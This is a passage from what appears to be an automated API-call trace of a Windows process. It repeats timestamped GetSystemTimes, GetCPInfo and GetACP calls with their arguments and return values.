lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.657] GetACP () returned 0x4e4 [0111.657] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.657] GetACP () returned 0x4e4 [0111.658] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.658] GetACP () returned 0x4e4 [0111.658] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.658] GetACP () returned 0x4e4 [0111.658] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.658] GetACP () returned 0x4e4 [0111.658] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.658] GetACP () returned 0x4e4 [0111.658] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.658] GetACP () returned 0x4e4 [0111.658] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.659] GetACP () returned 0x4e4 [0111.659] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.659] GetACP () returned 0x4e4 [0111.659] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.659] GetACP () returned 0x4e4 [0111.659] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.659] GetACP () returned 0x4e4 [0111.659] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.659] GetACP () returned 0x4e4 [0111.659] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.659] GetACP () returned 0x4e4 [0111.659] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.660] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.660] GetACP () returned 0x4e4 [0111.661] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.661] GetACP () returned 0x4e4 [0111.661] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.661] GetACP () returned 0x4e4 [0111.661] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.661] GetACP () returned 0x4e4 [0111.661] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.661] GetACP () returned 0x4e4 [0111.661] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.661] GetACP () returned 0x4e4 [0111.661] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.662] GetACP () returned 0x4e4 [0111.662] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.662] GetACP () returned 0x4e4 [0111.662] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.662] GetACP () returned 0x4e4 [0111.662] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.662] GetACP () returned 0x4e4 [0111.662] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.662] GetACP () returned 0x4e4 [0111.662] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.662] GetACP () returned 0x4e4 [0111.662] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.663] GetACP () returned 0x4e4 [0111.663] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.663] GetACP () returned 0x4e4 [0111.663] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.663] GetACP () returned 0x4e4 [0111.663] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.663] GetACP () returned 0x4e4 [0111.663] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.663] GetACP () returned 0x4e4 [0111.663] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.663] GetACP () returned 0x4e4 [0111.663] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.664] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.664] GetACP () returned 0x4e4 [0111.664] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.664] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.664] GetACP () returned 0x4e4 [0111.664] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.664] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.664] GetACP () returned 0x4e4 [0111.664] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.664] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.664] GetACP () returned 0x4e4 [0111.664] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.664] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.664] GetACP () returned 0x4e4 [0111.664] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.664] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.664] GetACP () returned 0x4e4 [0111.665] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.665] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.665] GetACP () returned 0x4e4 [0111.665] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.665] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.665] GetACP () returned 0x4e4 [0111.665] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.665] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.665] GetACP () returned 0x4e4 [0111.665] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.665] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.665] GetACP () returned 0x4e4 [0111.665] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.666] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.666] GetACP () returned 0x4e4 [0111.666] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.666] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.666] GetACP () returned 0x4e4 [0111.666] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.666] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.666] GetACP () returned 0x4e4 [0111.666] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.666] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.666] GetACP () returned 0x4e4 [0111.666] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.667] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.667] GetACP () returned 0x4e4 [0111.667] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.667] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.667] GetACP () returned 0x4e4 [0111.667] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.667] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.667] GetACP () returned 0x4e4 [0111.667] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.667] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.668] GetACP () returned 0x4e4 [0111.668] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.668] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.668] GetACP () returned 0x4e4 [0111.668] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.668] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.668] GetACP () returned 0x4e4 [0111.668] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.668] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.668] GetACP () returned 0x4e4 [0111.668] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.669] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.669] GetACP () returned 0x4e4 [0111.669] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.669] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.669] GetACP () returned 0x4e4 [0111.669] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.669] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.669] GetACP () returned 0x4e4 [0111.669] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.669] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.669] GetACP () returned 0x4e4 [0111.669] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.669] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.669] GetACP () returned 0x4e4 [0111.669] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.669] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.669] GetACP () returned 0x4e4 [0111.669] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.670] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.670] GetACP () returned 0x4e4 [0111.670] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.670] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.670] GetACP () returned 0x4e4 [0111.670] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.670] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.670] GetACP () returned 0x4e4 [0111.670] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.670] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.671] GetACP () returned 0x4e4 [0111.671] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.671] GetACP () returned 0x4e4 [0111.671] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.671] GetACP () returned 0x4e4 [0111.671] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.671] GetACP () returned 0x4e4 [0111.671] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.672] GetACP () returned 0x4e4 [0111.672] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.673] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.673] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.673] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 